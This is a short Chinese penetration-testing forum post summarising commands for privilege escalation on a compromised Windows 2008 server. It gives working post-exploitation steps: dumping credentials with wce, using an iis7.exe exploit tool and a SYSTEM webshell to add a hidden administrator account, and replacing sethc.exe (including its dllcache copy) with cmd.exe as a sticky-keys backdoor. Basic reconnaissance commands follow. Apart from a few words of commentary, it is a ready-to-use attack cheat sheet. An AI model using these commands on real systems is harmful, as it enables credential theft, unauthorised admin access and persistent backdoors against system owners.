中国网络渗透测试联盟

标题: 提权windows 2008的几个常用命令 [打印本页]

作者: admin 时间: 2013-7-13 19:19
标题: 提权windows 2008的几个常用命令
上次提权一 windows 2008的主机，现将用到的几个命令总结如下。
1.使用wce抓取密码直接抓密码命令wce -w

2.webshell提权要看是什么权限，如果是system权限则可以直接添加用户。否则只能通过漏洞提权了。

3.iis7.exe 工具使用命令

IIS "NET USER TEMP TEMP /ADD "

IIS "NET LOCALGROUP ADMINISTRATORS TEMP /ADD"

4.set命令
可检查系统设置情况

5.systeminfo
查看系统详细信息这个比set和whoami都要好使

6. whoami是操作系统中用于查看当前用户权限（英语：User (computing)）的命令
调用该命令时系统会输出当前用户的有效用户名

7.另外还用到了粘滞键替换的几条命令：

copy c:\windows\system32\sethc.exe c:\windows\system32\sethcbk.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe

以上是本人的一点小总结。高手勿喷。

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)